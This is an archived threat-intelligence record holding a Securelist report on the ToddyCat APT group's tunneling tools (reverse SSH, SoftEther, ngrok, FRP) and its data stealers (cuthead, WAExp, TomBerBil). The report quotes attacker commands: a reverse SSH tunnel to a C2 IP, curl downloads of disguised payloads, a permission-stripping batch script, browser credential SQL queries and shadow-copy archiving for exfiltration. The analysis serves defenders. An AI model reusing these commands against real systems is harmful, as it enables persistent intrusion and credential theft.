{
	"id": "1f980ce6-014a-4bb3-b0f2-fb62ac846961",
	"created_at": "2026-04-06T00:16:52.912052Z",
	"updated_at": "2026-04-10T03:33:16.324809Z",
	"deleted_at": null,
	"sha1_hash": "42091812ae0c94478eda510aeca9b38fc6c273df",
	"title": "ToddyCat is making holes in your infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 414703,
	"plain_text": "ToddyCat is making holes in your infrastructure\r\nBy Andrey Gunkin\r\nPublished: 2024-04-22 · Archived: 2026-04-05 16:45:55 UTC\r\nWe continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for\r\ncollecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain\r\nconstant access to compromised infrastructure, what information on the hosts they are interested in, and what tools\r\nthey use to extract it.\r\nToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related,\r\nlocated in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.\r\nDuring the observation period, we noted that this group stole data on an industrial scale. To collect large volumes\r\nof data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide\r\nseveral alternative means to continuously access and monitor systems they attack. We decided to investigate how\r\nthis was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the\r\nattackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most\r\ncases, the adversary connected, transferred and ran all required tools with the help of PsExec or Impacket.\r\nHaving several tunnels to the infected infrastructure implemented with different tools allows attackers to maintain\r\naccess to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the\r\ninfrastructure, attackers are able to perform reconnaissance and connect to remote hosts.\r\nReverse SSH Tunnel\r\nOne way to gain access to remote network services is to create a reverse SSH tunnel.\r\nAttackers use several files to launch a reverse SSH tunnel:\r\n1. 
The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it\r\n2. An OPENSSH private key file\r\n3. The “a.bat” script to hide the private key file\r\nThe attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote\r\nServices: SMB/Windows Admin Shares).\r\nThe attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original\r\nname and was placed inside folders whose names indicated the presence of an SSH client in the system.\r\nC:\\program files\\OpenSSH\\ssh.exe\r\nC:\\programdata\\sshd\\ssh.exe\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 1 of 18\n\nC:\\programdata\\ssh\\ssh.exe\r\nThe private key files required for establishing a connection to the remote server were copied to the following\r\npaths.\r\nC:\\Windows\\AppReadiness\\read.ini\r\nC:\\Windows\\AppReadiness\\data.dat\r\nC:\\Windows\\AppReadiness\\log.dat\r\nC:\\Windows\\AppReadiness\\value.dat\r\nOpenSSH private key files are normally created without extensions, but they can be given the extension .key or\r\nsimilar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true\r\npurpose. Files like that look less suspicious in the command-line interface than .key files or files without an\r\nextension.\r\nAfter the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat\r\nscript. 
In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.\r\nThis file contains the following commands.\r\n@echo off\r\n::# Set Key File Variable:\r\nSet Key=\"C:\\Windows\\AppReadiness\"\r\ntakeown /f \"%Key%\"\r\nicacls \"%Key%\" /remove \"BUILTIN\\Administrators\" \u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"Administrators\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"NT AUTHORITY\\Authenticated Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"CREATOR OWNER\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"BUILTIN\\Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" \u003e\u003e \"%temp%\\a.txt\"\r\n::# Remove Variable:\r\nset \"Key=\"\r\nIn Windows, C:\\Windows\\AppReadiness is part of the AppReadiness service and stores application files for\r\ninitial configuration when applications are first launched or when a user logs on for the first time.\r\nThe icacls command output for the AppReadiness folder with default values\r\nThe image above shows the default permissions for this folder:\r\nAdministrators and system: full permissions\r\nAuthorized users: read-only permissions\r\nThis means that regular users can view the contents of the folder.\r\nThe a.bat script sets the system as the owner of the folder and removes all other users from its discretionary\r\naccess control list (DACL). The image below shows the DACL for C:\\Windows\\AppReadiness after the script\r\nhas run:\r\nThe icacls command output for the AppReadiness folder after a.bat script has executed\r\nOnce the permissions have been changed, neither normal users nor administrators will be able to access this\r\nfolder. 
Attempting to open it will cause a “no permission” error.\r\nAccess denied error and Security tab for the AppReadiness folder\r\nTo start the tunnel, attackers create a scheduled task that runs the following command.\r\nC:\\PROGRA~1\\OpenSSH\\ssh.exe -i C:\\Windows\\AppReadiness\\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103[.]27.202.85 -p 22222 -fN\r\nThis command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as\r\nthe user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain\r\nport on the server to a certain port on the infected host. This is needed to provide the malicious server with\r\nconstant access to the services running on the target host and listening on the specified port.\r\nIn the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the\r\nserver to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain\r\nthe IP addresses of hosts on the internal network through DNS queries.\r\nEach user is assigned to a different port on the infected host. 
For example, the user systemtest05 redirects traffic\r\nfrom the malicious server to port 445, normally used by SMB services.\r\nThe remote server IP information is shown in the table below.\r\nIP: 103.27.202[.]85\r\nCountry + ASN: Thailand, AS58955\r\nNet name: BANGMOD-VPS-NETWORK\r\nNet Description: Bangmod VPS Network, Bangmod-IDC Supermicro Thailand Powered by CSloxinfo\r\nAddress Email: support@bangmod.co.th\r\nThe whole process of creating an SSH tunnel can be described with the diagram given below.\r\nDiagram of SSH tunnel creation\r\nSoftEther VPN\r\nThe next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN\r\npackage.\r\nSoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba\r\nthat allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP,\r\nL2TPv3, EtherIP and others.\r\nTo launch the VPN server, the attackers used the following files:\r\nvpnserver_x64.exe: a digitally signed VPN server executable\r\nhamcore.se2: a container file that includes components required to run vpnserver_x64.exe\r\nvpn_server.config: server configuration\r\nIn the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a\r\ncommand-line parameter.\r\nIn virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected\r\nsystem. 
The following names of, and paths to, this file are known:\r\nc:\\programdata\\ssh\\vmtools.exe\r\nc:\\programdata\\lenovo\\lenovo\\kln.exe\r\nc:\\programdata\\iobit\\iobitrtt\\tmp\\mstime.exe\r\nc:\\perflogs\\ecache\\boot.exe\r\nC:\\users\\public\\music\\wia.exe\r\nc:\\windows\\debug\\wia\\wia.exe\r\nc:\\users\\public\\music\\taskllst.exe\r\nc:\\programdata\\lenovo\\lenovo\\main.exe\r\nc:\\programdata\\intel\\gcc\\gcc\\boot.exe\r\nc:\\programdata\\lenovo\\lenovodisplaycontrolcenterservice\\netscan.exe\r\nc:\\programdata\\kasperskylab\\kaspersky.exe\r\nYou may notice that in some cases, the attackers used the names of security products to conceal the purpose of the\r\nfile.\r\nThe file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from\r\nthe same folder where the VPN server executable was located.\r\nTo transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared\r\nresources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote\r\nresources using the curl utility (see below).\r\n\"cmd.exe\" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\\windows\\debug\\wia\\wia.exe \u003e C:\\WINDOWS\\Temp\\vwqkspeq.tmp 2\u003e\u00261\r\n\"cmd.exe\" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o c:\\windows\\debug\\wia\\hamcore.se2 \u003e C:\\WINDOWS\\Temp\\nohEicOE.tmp 2\u003e\u00261\r\nWe observed the following remote resources being used as download sources.\r\nURL Original file name\r\nhxxp://www.netportal.or[.]kr/common/css/main.js vpnserver_x64.exe\r\nhxxp://www.netportal.or[.]kr/common/css/ham.js Hamcore.se2\r\nhxxp://23.106.122[.]5/hamcore.se2 Hamcore.se2\r\nhxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe vpnserver_x64.exe\r\nhxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 
Hamcore.se2\r\nIn most cases, the configuration file was copied along with the server executable. However, in some cases, it was\r\nnot copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then\r\nedited.\r\n\"cmd.exe\" /C c:\\users\\public\\music\\taskllst.exe /install \u003e C:\\Windows\\Temp\\fnOcaiqm.tmp 2\u003e\u00261\r\n\"cmd.exe\" /C c:\\users\\public\\music\\taskllst.exe /usermode_hidetray \u003e C:\\Windows\\Temp\\TSwkLRsR.tmp\r\nIn this case, after installing the server in the system, the attackers changed the server settings in\r\nvpn_server.config.\r\nData for connecting the remote client to the server and its authentication details are added to the configuration file:\r\nAccountName Hostname\r\nha.bbmouseme[.]com 118[.]193.40.42\r\nNgrok agent and Krong\r\nAnother way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An\r\napplication running on the user’s host with access to the local infrastructure can connect through a legitimate\r\nagent to the cloud and redirect traffic or run certain commands.\r\nNgrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The\r\nattackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain\r\nport on these hosts.\r\nThe agent can be started, for instance, with the following command.\r\n\"cmd\" /c \"cd C:\\windows\\temp\\ \u0026 Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --authtoken 2GskqGD\u003ctoken\u003etxB7WyV\"\r\nThe port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file\r\nside-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally\r\nsigned by AVG TuneUp. 
The tool receives through the command-line interface the address and the port on which\r\nto expect a connection.\r\n\"cmd\" /c \"cd C:\\windows\\temp\\ \u0026 SystemInformation.exe 0.0.0.0 54112\"\r\nKrong is a proxy that encrypts the data transmitted through it using the XOR function.\r\nCode snippet for deciphering received data\r\nThis allows Krong to hide the contents of the traffic to evade detection.\r\nFRP client\r\nAfter creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP\r\nclient. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located\r\nbehind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.\r\nThe attackers used two files to run the client:\r\nFrpc.exe: an FRP client executable file\r\nFrpc.toml: a client configuration file\r\nThe files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to\r\n.ini, as is the case with OpenSSH private key files.\r\nAfter copying the files to the target host, the attackers create a service with an arbitrary name, which is started via\r\nthe following command.\r\nc:\\windows\\debug\\tck.exe -c c:\\windows\\debug\\tc.ini\r\nThis starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.\r\nCuthead for data collection\r\nRecently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated\r\nfrom the “file description” field of the sample we found. It is a .NET compiled executable designed to search for\r\nfiles and store those it finds inside an archive. 
The tool can search for specified file extensions or words in the file\r\nname.\r\nThe cuthead tool accepts the following arguments:\r\nfkw.exe \u003cdate\u003e \u003cextensions\u003e [keywords]\r\nDate: the date when the file was last modified, in yyyyMMdd format. The search looks for files modified on that\r\ndate or later.\r\nExtensions: a string without spaces that contains file extensions separated by semicolons\r\nKeywords: a string without spaces that contains semicolon-delimited words to look for in file names\r\nHere is an example of a cuthead launch command.\r\n\"c:\\intel\\fkw.exe\" 20230626 pdf;doc;docx;xls;xlsx\r\nIn this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.\r\nOnce launched, the tool processes the command-line parameters and begins a recursive search for files in the file\r\nsystem on all available drives (T1005 Data from Local System). Folders that contain the following substrings are\r\nexcluded from the search.\r\n$\r\nWindows\r\nProgram Files\r\nProgramdata\r\nApplication Data\r\nProgram Files (x86)\r\nDocuments and Settings\r\nAlso, the files are excluded from the search if they meet the following criteria:\r\nThe file size is greater than 50 MB (52428800 bytes).\r\nThe file extensions do not match those specified in the command-line parameters.\r\nThe names do not contain the keywords specified in the command-line parameters.\r\nA list of files found by the search is passed to the function that creates ZIP archives with the password\r\n“Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 
0.85.4.369 is used for creating archives (T1560.002 Archive Collected\r\nData: Archive via Library).\r\nSeveral later variants of cuthead were found with all required options – a list of file extensions and a last modified\r\ndate that was typically within the previous 7 days – hardcoded within the software. We believe this was done to\r\nautomate the collection process.\r\nWAExp: WhatsApp data stealer\r\nThis tool is written in .NET and designed to search for and collect browser local storage files containing data from\r\nthe web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local\r\nstorage contains their profile details, chat data, the phone numbers of users they chat with and current session data.\r\nAttackers can gain access to this data by copying the browser’s local storage files.\r\nThe executable accepts the following arguments.\r\napp.exe [check|copy|start] [remote]\r\nCheck: checks the presence of data on the host.\r\nCopy: copies data it finds to the temporary folder.\r\nStart: first, copies the data to the temporary folder and then, packs the data into an archive file.\r\nRemote: the name of the remote host.\r\nWhen executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are\r\nsearched along “\\\\[remote]\\C$\\users\\“. If it is not specified, the malware uses the environment variable\r\n%SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder\r\non that drive. 
Next, the tool goes through all folders in this directory except the following default ones.\r\nAll Users\r\nDefault User\r\nDefault\r\nPublic\r\nAfter it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge,\r\nand Mozilla local storages.\r\nFor Chrome, the tool opens \u003cUser\u003e\\Appdata\\local\\Google\\ and for Edge,\r\n\u003cUser\u003e\\Appdata\\local\\Microsoft\\Edge\\. Inside these, it looks for a folder with the following name inside the\r\nsubfolders.\r\nhttps_web.whatsapp.com_0.indexeddb.leveldb\r\nFor Mozilla, the tool opens \u003cUser\u003e\\Appdata\\roaming\\ and looks for a folder with the following name inside the\r\nsubfolders:\r\nRoaming may contain several Mozilla folders with web.whatsapp.com storage data. For example, Mozilla\r\nThunderbird can store this data too, as it supports a WhatsApp plugin.\r\nWAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird\r\nIn the image above, you can see the output of the tool running with the “check” parameter. It shows storage files\r\nfor Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.\r\nWhen executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the\r\nfollowing temporary storage folder.\r\nC:\\Programdata\\Microsoft\\Default\\\r\nThe last parameter that the tool uses is “start”. 
It gathers target files inside a temporary folder, as described in the\r\ncopy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module\r\n(T1560.002 Archive Collected Data: Archive via Library).\r\nIt saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the\r\nfollowing path:\r\nC:\\Programdata\\Microsoft\\Default-yyyyMMdd-hhmmss\r\nAfter that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing\r\nweb.whatsapp.com data.\r\nThe image below shows an example of WAExp output when run with the various startup parameters.\r\nWAExp output for its various command-line parameters\r\nThe operations shown above collect Chrome data and generate an archive, whose contents are shown below.\r\nArchive file containing data stolen by WAExp\r\nTomBerBil for stealing passwords from browsers\r\nIn addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all\r\nonline services that target users have access to. For an adversary with high privileges in the system, one fairly easy\r\nway to do this is to decrypt browser data containing cookies and passwords that the user may have saved to\r\nautofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web\r\nBrowsers).\r\nThere are many open-source tools available for decrypting storage data, one of these being mimikatz. The\r\nproblem for the adversary is that these are well known to security systems and will immediately raise red flags if\r\ndetected in the infrastructure.\r\nTo avoid detection, attackers have created a range of tools implemented with different technologies and designed\r\nfor the same purpose: to extract cookies and passwords from Chrome and Edge. 
Both browsers use the\r\nCryptProtectData feature from DPAPI (Data Protection Application Programming Interface) to encrypt data. It\r\nprotects data with the current user’s password and a special encryption master key.\r\nAll TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all\r\nprocesses running in the system and search for all instances of explorer.exe. It identifies the process users and\r\ncompiles a list.\r\nUsername identification function\r\nThe image above shows an example of the function that identifies users by process ID. It sends a WMI request to\r\nthe Win32_Process class to receive an object whose processID property equals the given PID. It then calls the\r\nGetOwner method, which returns the user and domain name for the process.\r\nAfter this, the malware searches for the encryption key, stored in the encrypted_key field in the following\r\nbrowser JSON files.\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Local State\r\nIt then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData\r\nfunction. To do this, it calls the Unprotect function from the System.Security.Cryptography.ProtectedData\r\npackage, which, in turn, uses the CryptUnprotectData function from Windows DPAPI.\r\nCalling the Unprotect function\r\nThe image above shows an example of the Unprotect function call, which receives an array of bytes obtained\r\nfrom the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter.\r\nThis means that the user context of the calling process will be used when decrypting the data. 
The tool\r\nimpersonates the users it finds in explorer.exe for this very purpose.\r\nIf the decryption is successful, the malware searches for Login Data and \\Network\\Cookies files inside the\r\nfollowing folders.\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Profile *\r\nIt copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the\r\nfollowing queries.\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies\r\nData retrieved this way is decrypted with the master key and saved in special files.\r\nMost versions of the malware tool log their actions. Below is an example of a log file that they generate:\r\n[+] Begin 7/28/2023 1:12:37 PM\r\n[+] Current user SYSTEM\r\n[*] [5516] [explorer] [UserName]\r\n[+] Impersonate user UserName\r\n[+] Current user UserName\r\n[+] Local State File: C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\r\n[+] MasterKeyBytes: 6j\u003c...\u003ek=\r\n[\u003e] Profile: C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data to C:\\Windows\\TEMP\\tmpF319.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpF319.tmp\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies to C:\\Windows\\TEMP\\tmpFA1F.tmp\r\n[+] Delete File 
C:\\Windows\\TEMP\\tmpFA1F.tmp\r\n[+] Local State File: C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State\r\n[+] MasterKeyBytes: fv\u003c...\u003eGM=\r\n[\u003e] Profile: C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data to C:\\Windows\\TEMP\\tmpFCB0.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpFCB0.tmp\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies to C:\\Windows\\TEMP\\tmpFD5D.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpFD5D.tmp\r\n[+] Recvtoself\r\n[+] Current user SYSTEM\r\n[+] End 7/28/2023 1:12:52 PM\r\nOne of the variants mimics Kaspersky Anti-Virus. This executable, written in .NET, is named avpui.exe\r\n(T1036.005 Masquerading: Match Legitimate Name or Location) and contains relevant metadata:\r\nMetadata of the tool pretending to be KAV\r\nSome versions of the tool required specific command-line parameters to start. An example can be seen below:\r\nA TomBerBil variant started with a parameter\r\nIn several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the User\r\nData folder with 7zip for further exfiltration.\r\nwmic shadowcopy call create Volume='C:\\'\r\n\"cmd\" /c c:\\Intel\\7z6.exe a c:\\Intel\\1.7z -mx0 -r \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Users\\\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\\"User Data\\\"\r\nConclusion\r\nWe looked at several tools that allow the attackers to maintain access to target infrastructures and automatically\r\nsearch for and collect data of interest. 
The attackers are actively using techniques to bypass defenses in an attempt\r\nto mask their presence in the system.\r\nTo protect the organization’s infrastructure, we recommend adding to the firewall denylist the resources and IP\r\naddresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools\r\nadministrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or\r\nthoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid\r\nstoring passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords\r\nacross different services poses a risk of more data becoming available to attackers.\r\nIndicators of compromise\r\nFiles\r\nlegitimate tools\r\nC2 addresses\r\nLinks\r\nSource: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/"
	],
	"report_names": [
		"112443"
	],
	"threat_actors": [
		{
			"id": "d67df52c-a901-4d55-b287-321818500789",
			"created_at": "2024-04-24T02:00:49.591518Z",
			"updated_at": "2026-04-10T02:00:05.314272Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"ToddyCat"
			],
			"source_name": "MITRE:ToddyCat",
			"tools": [
				"Cobalt Strike",
				"LoFiSe",
				"China Chopper",
				"netstat",
				"Pcexter",
				"Samurai"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5",
			"created_at": "2022-10-25T16:07:24.329539Z",
			"updated_at": "2026-04-10T02:00:04.939013Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Operation Stayin’ Alive",
				"Storm-0247"
			],
			"source_name": "ETDA:ToddyCat",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"Cuthead",
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"Krong",
				"LoFiSe",
				"Ngrok",
				"PcExter",
				"PsExec",
				"SIMPOBOXSPY",
				"Samurai",
				"SinoChopper",
				"SoftEther VPN",
				"TomBerBil",
				"WAExp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434612,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.pdf",
		"text": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.txt",
		"img": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.jpg"
	}
}